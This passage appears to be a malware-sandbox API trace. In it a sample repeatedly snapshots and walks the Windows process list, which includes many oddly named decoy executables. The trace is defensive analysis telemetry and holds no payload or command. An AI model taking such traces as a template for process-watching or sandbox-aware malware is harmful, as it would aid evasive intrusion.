Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.000] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.001] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.042] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.043] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.045] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.046] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.047] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.048] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.051] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.052] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.053] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.055] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.056] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.057] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.058] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.059] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.060] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.061] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.062] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.063] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.064] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.065] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.066] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.067] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.068] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.069] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0106.070] CloseHandle (hObject=0xbc) returned 1 [0106.070] Sleep (dwMilliseconds=0x12c) [0106.370] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0106.375] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.376] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.377] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.378] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.379] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0106.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0106.380] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0106.381] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0106.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.382] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.383] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.384] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.385] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0106.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.386] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.387] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0106.388] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.389] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.391] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0106.392] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0106.393] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0106.394] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.395] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0106.396] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0106.397] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0106.398] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0106.399] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0106.401] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0106.402] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0106.403] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0106.404] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0106.405] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0106.406] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0106.407] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0106.408] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0106.409] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0106.448] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0106.449] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0106.450] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0106.451] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0106.452] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0106.453] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0106.454] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0106.455] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0106.456] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0106.457] CloseHandle (hObject=0xc4) returned 1 [0106.457] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0106.461] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0106.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0106.462] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0106.463] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0106.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0106.464] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, 